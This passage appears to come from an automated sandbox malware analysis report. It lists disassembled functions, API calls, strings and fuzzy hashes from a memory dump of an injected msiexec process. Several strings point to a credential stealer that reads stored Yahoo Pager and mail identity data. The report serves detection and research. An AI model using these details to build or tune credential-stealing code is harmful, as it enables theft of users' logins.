                                                                                                                                                  • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                • String ID: MS Sans Serif
                                                                                                                                                • API String ID: 3492281209-168460110
                                                                                                                                                • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassName_strcmpimemset
                                                                                                                                                • String ID: edit
                                                                                                                                                • API String ID: 275601554-2167791130
                                                                                                                                                • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen$_mbscat
                                                                                                                                                • String ID: 3CD
                                                                                                                                                • API String ID: 3951308622-1938365332
                                                                                                                                                • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: rows deleted
                                                                                                                                                • API String ID: 2221118986-571615504
                                                                                                                                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                                                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                                                                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                • memset.MSVCRT ref: 0040D319
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 368790112-0
                                                                                                                                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __allrem.LIBCMT ref: 00425850
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                • __allrem.LIBCMT ref: 00425933
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                • API String ID: 2221118986-515162456
                                                                                                                                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                • memset.MSVCRT ref: 004026AD
                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3503910906-0
                                                                                                                                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                                                                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4107816708-0
                                                                                                                                                • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                • strftime.MSVCRT ref: 00411476
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1886415126-0
                                                                                                                                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strlen
                                                                                                                                                • String ID: >$>$>
                                                                                                                                                • API String ID: 39653677-3911187716
                                                                                                                                                • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: @
                                                                                                                                                • API String ID: 3510742995-2766056989
                                                                                                                                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strcmpi
                                                                                                                                                • String ID: C@$mail.identity
                                                                                                                                                • API String ID: 1439213657-721921413
                                                                                                                                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                Function 00444551 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00444573
                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValuememset
                                                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                • API String ID: 3363972335-1703613266
                                                                                                                                                • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                                                • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                                                                • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00406640
                                                                                                                                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                  • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset$memcmp
                                                                                                                                                • String ID: Ul@
                                                                                                                                                • API String ID: 270934217-715280498
                                                                                                                                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                Strings
                                                                                                                                                • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                • String ID: recovered %d pages from %s
                                                                                                                                                • API String ID: 985450955-1623757624
                                                                                                                                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _ultoasprintf
                                                                                                                                                • String ID: %s %s %s
                                                                                                                                                • API String ID: 432394123-3850900253
                                                                                                                                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                • String ID: menu_%d
                                                                                                                                                • API String ID: 1129539653-2417748251
                                                                                                                                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _msizerealloc
                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                • API String ID: 2713192863-2134078882
